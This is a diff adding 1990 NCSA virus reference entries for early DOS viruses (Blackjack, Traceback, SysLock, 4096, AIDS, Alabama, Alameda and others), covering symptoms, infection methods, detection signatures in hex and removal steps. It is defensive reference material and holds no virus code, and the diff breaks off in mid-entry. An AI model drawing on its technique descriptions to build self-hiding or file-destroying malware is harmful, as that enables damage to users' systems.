diff --git a/textfiles.com/virus/NCSA/ncsa009.txt b/textfiles.com/virus/NCSA/ncsa009.txt new file mode 100644 index 00000000..6bab59b5 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa009.txt @@ -0,0 +1,115 @@ + Ŀ + VIRUS REPORT + 1704 Format + + +Synonyms: Blackjack, 1704, Falling Letters. + +Date of Origin: September, 1988. + +Place of Origin: Germany. + +Host Machine: PC compatibles. + +Host Files: Remains resident. Infects COM files. + +Increase in Size of Infected Files: 1704 bytes. + +Nature of Damage: Affects system run-time + operation. Corrupts program or overlay files. Formats or erases + all/part of the hard disk upon activation. + +Detected by: Scanv56+, F-Prot, IBM Scan, Pro + -Scan. + +Removed by: CleanUp, M-1704, Scan/D, F-Prot. + +Derived from: 1701 (Cascade) virus. + +Scan Code: Uses self-encryption. FA 8B EC E8 + 00 00 5B 81 EB 31 01 2E F6 87 2A 01 01 74 0F 8D B7 4D 01 BC + 85 06 31 34 31 24 46 4C 75 F8. + + The code for the 1704 virus is identical to the 1701 except for a +single instruction. The only differences are the removal of a +conditional jump from the 1701 (which would never have been taken), and +some necessary segment overrides on the BIOS tests missing in the +previous version. The virus was designed to not infect micros +manufactured by IBM, but errors in coding enable it to infect any PC, +regardless of origin. The virus tests the BIOS for the string "COPR. +IBM", and contains code to not infect if it finds this - however there +are errors in the code which prevent it from working. + + As with the 1701, the 1704 can recognize if it has previously +infected a file. However, because recognition depends on the length of +the virus, it will infect programs already infected by variants with +different lengths. (1701 will infect COM files infected with 1704, and +vice versa.) + + The encryption of this virus is different in each instance of the +virus, being dependent on the size of the host file. + + The hard disk is formatted when the virus activates. + + This virus has been termed "Blackjack", which is a pun on the German +name "17+4" of a popular card game. + + Blackjack infects only COM-files which are at least 3 bytes long, and +it does so only once for any given file. It overwrites the first three +bytes with a JMP to the beginning of the viral code, which is appended to +the file. The 2 byte address of this JMP instruction is probably the +reason why only COM files are susceptible to infection. Blackjack +retains the file's time stamp. It even infects read-only files; on +write-protected floppy disks, it attempts writing 5 times per file, thus +revealing its activity. + + In the infected file, the viral code is cryptographically encoded, +using a simple Vigenere code depending on the length of the file; only +the instructions for decoding the encrypted part of the code are in plain +machine-language. This is obviously intended as a impediment against +disassembling. Hence, every copy of the virus looks different +(depending on the length of the file). + + On invocation of an infected program, Blackjack installs itself in +RAM (if no copy is already installed), then replaces the JMP instruction +with its former contents and resumes normal program operation. + + The storage map shows that Blackjack has tinkered with the free +storage pointer-chain to hide the fact that it has hooked interrupt 21. +Hence, only a minor part of Blackjack is visible in the storage map. + + In every year, from October to December, Blackjack will interfere +with CGA or EGA operated screens, moving randomly chosen characters +down, like falling leaves in autumn. After a while, you'll have a big +heap of characters at the bottom of your screen, and as you cannot see +anymore what the computer is trying to display, you'll probably have to +restart the system. This behaviour has been predicted by two people, who +have disassembled Blackjack, and has later been observed on many +EGA-equipped ATs. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa010.txt b/textfiles.com/virus/NCSA/ncsa010.txt new file mode 100644 index 00000000..b22b0426 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa010.txt @@ -0,0 +1,50 @@ + Ŀ + VIRUS REPORT + 1720 Virus + + +Synonyms: PSQR Virus + +Date of Origin: March, 1990. + +Place of Origin: Barcelona, Spain. + +Host Machine: PC compatibles. + +Host Files: COM, EXE, and overlay files. + Becomes memory resident. + +Increase in Size of Infected Files: n/a. + +Detected by: Scanv61+ + +Removed by: Scan/D, or delete the infected files. + +Derived from: Jerusalem. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa011.txt b/textfiles.com/virus/NCSA/ncsa011.txt new file mode 100644 index 00000000..407268c8 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa011.txt @@ -0,0 +1,52 @@ + Ŀ + VIRUS REPORT + 2930 + + +Synonyms: Traceback II + +Host Machine: PC compatibles. + +Host Files: Remains resident. Infects COM, EXE + files. + +Increase in Size of Infected Files: 2930 bytes. + +Nature of Damage: Corrupts program or overlay files. + +Detected by: Scanv41+, F-Prot, IBM Scan, Pro-Scan. + +Removed by: CleanUp, Scan/D, F-Prot, or delete infected files. + +Derived from: may be original. See 3066/Traceback. + + Traceback II may be the predecessor of the Traceback (3066) virus, +though the latter was discovered first. They are similar in function, +but produce differences in the size of infected files. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa012.txt b/textfiles.com/virus/NCSA/ncsa012.txt new file mode 100644 index 00000000..8506a2df --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa012.txt @@ -0,0 +1,84 @@ + Ŀ + VIRUS REPORT + 3066 + + +Synonyms: Traceback. + +Host Machine: PC compatibles. + +Host Files: Remains resident. Infects COM, EXE files. + +OnScreen Symptoms: Cascading display one hour after activation, lasting +one minute, followed by restoration of screen to condition prior to +cascade. + +Increase in Size of Infected Files: 3066 bytes. + +Nature of Damage: Corrupts COM and EXE files. + +Detected by: Scanv56+, F-Prot, IBM Scan, Pro-Scan. + +Removed by: M-3066, VirClean, F-Prot, or delete any infected files. + +Derived from: Traceback II/2930. + +Scan Code: E8 71 06 E8 28 06 B4 19 CD 21 89 B4 51 01 81 84 51 01 84 08 8C +8C 53 01. You can also search at 108H for 89 B4 51 01 81 84 51 01 84 08. + + After an infected program is run, Traceback becomes memory resident, +infecting every COM or EXE that is run. Additionally, if the system date +is after December 5, 1988, it will attempt to infect one additional COM +or EXE file in the current directory. If no uninfected file are available +in the current directory, it searches the entire disk, starting at the +root directory, looking for a victim. This search terminates if it +encounters an infected file before finding a candidate non-infected +file. + + This virus derives its name from two characteristics: + +* Infected files contain the directory path of the file causing the + infection within the viral code. Consequently, it is possible to + "trace back" the infection through a number of files. + +* When Traceback succeeds in infecting a program, it attempts to + update a counter in the program from which Traceback was + activated in that session. Because Traceback takes over disk error + handling while trying to update the original infected program, the + user will be unaware that an error occurred if Traceback can't + update its counter. + + The primary symptom of the Traceback virus having infected the +system is that it will produce a screen display with a cascading effect +similar to the Cascade/1701/1704 virus. The cascading display occurs one +hour after system memory is infected, and lasts one minute, after which +the display is restored. Any keystroke during this interval will hang up +the system. The cascade/restore sequence is repeated at one hour +intervals. See also 2930. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa013.txt b/textfiles.com/virus/NCSA/ncsa013.txt new file mode 100644 index 00000000..68972c43 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa013.txt @@ -0,0 +1,63 @@ + Ŀ + VIRUS REPORT + 3551 Virus + + +Synonyms: Syslock, 3555 + +Host Machine: PC compatibles. + +Host Files: Encrypting, non-resident. Infects COM, EXE files. + +Increase in Size of Infected Files: 3551-3555 bytes. + +Nature of Damage: Corrupts COM and EXE files. May corrupt data files. + +Detected by: Scanv56+, F-Prot, Pro-Scan. + +Removed by: CleanUp, Scan/D, or F-Prot. + +Scan Code: Uses self-encryption. + + When an infected program is run, SysLock searchs through the COM and +EXE files and subdirectories on the current disk, picking one executable +file at random to infect. The infected file will have its length +increased by about 3,551 bytes. + + The SysLock virus will damage files by searching for the word +"Microsoft" in any combination of upper and lower case characters, and +when found replace the word with either "MACROSOFT". If it finds an +environment variable of "SYSLOCK" has been set to "@" (hex 40), the virus +will not infect any programs or perform string replacements, but will +instead pass control to its host immediately. The author may have used +this during the creation of the virus. + + One known variant is called Macho-A. It is identical to the SysLock +virus, except that "Microsoft" is replaced with "MACHOSOFT". + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa014.txt b/textfiles.com/virus/NCSA/ncsa014.txt new file mode 100644 index 00000000..7b723911 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa014.txt @@ -0,0 +1,44 @@ + Ŀ + VIRUS REPORT + 3555 + + +Host Machine: PC compatibles. + +Host Files: COMMAND.COM, COM files. + +Increase in Size of Infected Files: 3555 bytes. + +Scan Code: encrypted. + + It does not appear to be memory resident, and infects COM files at +the time that an infected program is loaded. It does not appear to be +memory resident. It sometimes causes the message -"Error Writing to +Device AUX1" to occur at the time an infected program is executed. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa015.txt b/textfiles.com/virus/NCSA/ncsa015.txt new file mode 100644 index 00000000..185314f8 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa015.txt @@ -0,0 +1,82 @@ + Ŀ + VIRUS REPORT + 4096 virus + + +Synonyms: Century Virus, IDF Virus, Stealth Virus, 100 Years Virus + +Date of Origin: January, 1990. + +Host Machine: PC compatibles. + +Increase in Size of Infected Files: 4096 bytes. + +Nature of Damage: Remains resident. Infects COMMAND.COM, COM, EXE, +overlay files. + +Detected by: Scanv53+, F-Prot, IBM Scan, Pro-Scan. + +Removed by: CleanUp, Scan/D, F-Prot. See below. + + This virus is one of the most brutal ever developed, and no one seems +to successfully recover from it. It infects COM, EXE, and overlay files, +adding 4,096 bytes to their length. Once the virus is resident in memory, +the increase in length will not appear in a directory listing, and it +will infect any executable file that is opened, including those opened +with the COPY or XCOPY command. + + Through FAT manipulation, the virus destroys files through a slow +crosslinking process that would seem to be a hardware problem. + + If the virus is present in memory and you attempt to copy infected +files, the new copy of the file will not be infected if the extension is +neither COM nor EXE. Thus, one way to disinfect a system is as follows: + +* copy all the infected files to diskettes with a non-executable file + extension. For instance, you might COPY *.EXE *.E and COPY + *.COM *.C. + +* Shut the system off. Reboot from an uninfected and write-protected + disk. + +* Delete any infected files and restore the backed up files to the + original executable file names and extensions. (COPY *.C *.COM; COPY + *.E *.EXE) + + This procedure will not save any cross-linked files, however. + + Some notes: + +* Systems infected with this virus may hang after September 22 of any + year, due to a bug. This is the birthday of Bilbo and Frodo Baggin, in + the Lord of the Rings. + +* The virus contains an unused boot sector, which if copied to the boot + sector of a diskette, will produce the message "FRODO LIVES". + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa016.txt b/textfiles.com/virus/NCSA/ncsa016.txt new file mode 100644 index 00000000..def46ee8 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa016.txt @@ -0,0 +1,67 @@ + Ŀ + VIRUS REPORT + AIDS + + +Synonyms: VGA2CGA, Taunt, Hahaha. + +Host Machine: PC compatibles. + +Host Files: COM files. + +OnScreen Symptoms: When activated, displays "Your computer now has +AIDS". The word "AIDS" covers about half the screen. Following display +of this message, the system halts and must be rebooted.. + +Increase in Size of Infected Files: n/a. + +Nature of Damage: Overwrites first 13K of infected programs. Not memory- +resident. + +Detected by: Scanv40+, Pro-Scan. + +Removed by: CleanUp, or Scan/D, or delete infected .COM files. + + The AIDS virus was first reported attached to a program called +VGA2CGA. It is known as "Hahaha" in Europe, and IBM refers to it as the +"Taunt" virus. When it activates, it displays the message "Your computer +now has AIDS". After the message display, the system is halted. You will +need to turn it off and reboot to restart it. + + The only protection against the AIDs virus is full backups of your +.COM files. Written in Turbo C, it copies itself over the first 13K bytes +of a .COM file. The original function of the .COM program is lost, and +any other .COM files locatable by the program are also overwritten in +this manner. It evidently has a minimum size which it will not infect, +but it also totally loses all the data at the beginning of the programs. +Recovery of a damage program is not possible. + + This virus should not be confused with the AIDS Information Disk +Trojan. See also the Lisbon virus. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa017.txt b/textfiles.com/virus/NCSA/ncsa017.txt new file mode 100644 index 00000000..81529c78 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa017.txt @@ -0,0 +1,65 @@ + Ŀ + VIRUS REPORT + AIDS II Virus + + +Synonyms: Companion Virus + +Date of Origin: April, 1990. + +Place of Origin: The Netherlands? + +Host Machine: PC compatibles. + +Host Files: non-resident. Infects COM and EXE files. + +OnScreen Symptoms: See messages below. Also a melody is played. + +Increase in Size of Infected Files: 8,064 bytes. + +Nature of Damage: none. + +Detected by: on-screen message. + +Removed by: delete COM files created by the virus. They will bear the +date and time of infection. + + This virus does not infect files, but rather creates a 8,064 byte COM +file of the same name as an existing EXE file. When a user enters the +first name of the EXE file, the COM file runs, a melody is played, and +the COM file displays the message: "Your computer is infected with... +(heart character) Aids Virus II. - Signed WOP & PGT of DutchCrack - ". +The COM file then "spawns" the EXE file's process -- permits the normal, +uninfected EXE to run, after which control is returned to the COM file. +At this time, the melody is played again, and the message displayed is +"Getting used to me? Next time, use a condom..." + + The virus is significant in that it "infects" a file without touching +it at all, and thus escapes detection by CRC examination programs. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa018.txt b/textfiles.com/virus/NCSA/ncsa018.txt new file mode 100644 index 00000000..eb8525e6 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa018.txt @@ -0,0 +1,77 @@ + Ŀ + VIRUS REPORT + Alabama Virus + + +Date of Origin: October 13, 1989. + +Place of Origin: Israel. + +Host Machine: PC compatibles. + +Host Files: Remains resident. Infects EXE files. + +OnScreen Symptoms: One hour after activation, the virus displays this +message in a flashing box: + +"SOFTWARE COPIES PROHIBITED BY INTERNATIONAL LAW + +Box 1055 Tuscambia ALABAMA USA." + +Increase in Size of Infected Files: 1560 bytes. + +Nature of Damage: Affects system run-time operation. Corrupts program or +overlay files. Directly or indirectly corrupts file linkage. + +Detected by: Scanv43+, F-Prot, IBM Scan, Pro-Scan. + +Removed by: CleanUp, F-Prot, or delete infected files. + + This virus was isolated by Ysrael Radai at Hebrew University. It +manipulates the file allocation table and swaps file names so that files +are slowly lost. + + The Alabama virus will infect .EXE files, increasing their size by +1,560 bytes. It moves into memory when any EXE containing the virus is +executied. Unlike most other memory-resident viruses, the Alabama does +not use the normal TSR function, but rather hooks interrupt 9 as well as +IN and OUT commands. Upon detecting a Control-Alt-Delete, the virus +generates what appears to be a warm boot, but remains in memroy. The +virus loads to the top 30K of memory, unlike other memory-resident +programs, and does not reduce the available memory reported by DOS. + + The Alabama virus uses a complex procedure during infection. It will +first infect an EXE in the current directory, providing there is one +which is uninfected. If all EXEs in the current directory are infected, +then the Alabama virus will infect the program being executed -- +provided the system date is not Friday. On Fridays, the Alabama virus +will swap entries in the FAT so that when the user attempts to execute an +uninfected file, an infected file executes instead. Over time, files +will be lost through this process. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa019.txt b/textfiles.com/virus/NCSA/ncsa019.txt new file mode 100644 index 00000000..d68af8ae --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa019.txt @@ -0,0 +1,115 @@ + Ŀ + VIRUS REPORT + Alameda Virus + + +Synonyms: Yale, Merritt, Peking, Seoul virus. + +Date of Origin: Spring, 1987. + +Place of Origin: Merritt College, Alameda, California. + +Host Machine: PC compatibles. Does not run on 80286. + +Host Files: Remains resident. Infects floppy disk boot sector. + +Increase in Size of Infected Files: n/a. + +Nature of Damage: Resident. Corrupts or overwrites floppy boot sector. + +Detected by: Scanv56+, F-Prot, IBM Scan. + +Removed by: CleanUp, MDisk, F-Prot, or DOS SYS command.. + +Scan Code: BB 40 00 8E DB A1 13 00 F7 E3 2D E0 07 8E C0 0E 1F 81 FF 56 34 +75 04 FF 0E F8 7D. You can also search at offset 00EH for A1 13 00 F7 E3 +2D E0 07. + +History: First discovered at Merritt college in California in the Spring +of 1987. In February, 1988, it popped up at Alameda College, where it +received large publicity. In October, 1988, it surfaced at Yale +University, where it became known as the Yale virus. The original +version caused no intentional damage. + + The original Alameda would only run on an 8088/8086, and was +presumably assembled using A86 on such a machine. Because it does not +infect hard disks, we may presume that the author's machine did not have +one. The original version would not run on an 80286 or an 80386 machine, +although it will infect on such a machine. Later versions of the virus +can run on an 80286. + +Description of Operation: The Alameda virus spends its life in the boot +sector of 5.25" 360K floppy disks. When the machine boots from an +infected 360K floppy, the Alameda becomes memory resident, occupying 1K +of memory. It infects 360K floppies in the A: drive only. Pressing +Ctrl-Alt-Del activates the virus, rather than removing it from memory. +At this point, it looks for a floppy in drive A: to infect. It will +infect any 360K disk in that drive, whether or not it is a bootable disk. + + The original boot sector is held in track thirty-nine, head zero, +sector eight. It does not map this sector bad in the FAT (unlike the +Brain) and should that area be used by a file, the virus will die. It +apparently uses head 0, sector 8 and not head 1 sector 9 because this is +common to both single sided and double sided formats and common to both +8-sectored and 9-sectored formats (both the old 160K single sided and +later 180K single sided formats). + + Alameda redirects the keyboard interrupt (INT 09H) to look for +Ctrl-Alt-Del sequences. When it detects Ctrl-Alt-Del, it will attempt to +infect any floppy it finds in drive A:. + + The virus is not malevolent. It contains code to format track +thirty-nine, head zero, but this has been disabled. It also contains a +count of the number of times it has infected other diskettes, although it +is referenced for write only and is not used as part of an activation +algorithm. The virus remains resident at all times after it is booted, +even if the user removes the floppy from a machine having no bootable +hard disk, and reboots with Ctrl-Alt-Del. When Ctrl-Alt-Del is pressed +from inside Cassette Basic, it activates and infects the floppy from +which the user is attempting to boot. + + Alameda contains no anti-detection mechanisms as does the Brain +virus. + + The Alameda contains a rare POP CS instruction that is not understood +by 80286 systems, and hangs the system up. The POP CS command is used to +pass control to itself in upper memory. When such a machine hangs, the +virus has already installed itself in high RAM and hooked the keyboard +interrupt, so that the infection can spread if a warm boot is then +performed. + +Removal: Alameda can not only live through an Ctrl-Alt-Del reboot +command, but this is its only means of reproduction to other floppy +diskettes. The only way to remove it from an infected system is to turn +the machine off and reboot with an uninfected copy of DOS. The Norton +utilities can be used to identify infected diskettes by looking at the +boot sector and the DOS SYS utility can be used to remove it <197> unlike +the Brain. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa020.txt b/textfiles.com/virus/NCSA/ncsa020.txt new file mode 100644 index 00000000..6fa31c21 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa020.txt @@ -0,0 +1,42 @@ + Ŀ + VIRUS REPORT + Alameda-B + + +Synonyms: Sacramento Virus, Yale C + +Host Machine: PC compatibles. + +Derived from: Alameda + + This is the original Alameda Virus that has the POP CS removed. +Relocation is accomplished through a long jump instruction. All other +characteristics are identical. This version, unlike the original +Alameda, runs on a 286. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa021.txt b/textfiles.com/virus/NCSA/ncsa021.txt new file mode 100644 index 00000000..61bdc627 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa021.txt @@ -0,0 +1,42 @@ + Ŀ + VIRUS REPORT + Alameda-C + + +Host Machine: PC compatibles. + +Derived from: Alameda-B + + This is the Alameda-B virus that has been modified to disable the +boot function after 100 infections. The counter in the original Alameda +virus has been re-activated and is interrogated at each bootup. When it +reaches 100, the virus disconnects from the original boot sector +(control is no longer passed) and the diskette will no longer boot. At +infection time, the counter is zeroed on the host diskette. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa022.txt b/textfiles.com/virus/NCSA/ncsa022.txt new file mode 100644 index 00000000..cab47ddc --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa022.txt @@ -0,0 +1,54 @@ + Ŀ + VIRUS REPORT + Amstrad Virus + + +Date of Origin: Reported in November, 1989 by Jean Luz, an NCSA member. +Known for about one year prior to that in Spain and Portugal. + +Place of Origin: Spain and Portugal + +Host Machine: PC compatibles. + +Host Files: COM files other than COMMAND.COM. Not memory resident. + +OnScreen Symptoms: Displays a fake advertisement for the Amstrad +computer. + +Increase in Size of Infected Files: 847 bytes. + +Nature of Damage: May corrupt program or overlay files. + +Detected by: Scanv51+, F-Prot, IBM Scan, Pro-Scan. + +Removed by: CleanUp, Scan/D, F-Prot, or simply erase the infected files. + + This virus appears to cause no damage beyond replication, which may +occasionally damage a COM file. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa023.txt b/textfiles.com/virus/NCSA/ncsa023.txt new file mode 100644 index 00000000..b2a9f02d --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa023.txt @@ -0,0 +1,44 @@ + Ŀ + VIRUS REPORT + Anarkia + + +Host Machine: PC compatibles. + +Host Files: COM and EXE files. + +Increase in Size of Infected Files: n/a. + +Nature of Damage: Progressively slows CPU operations -- 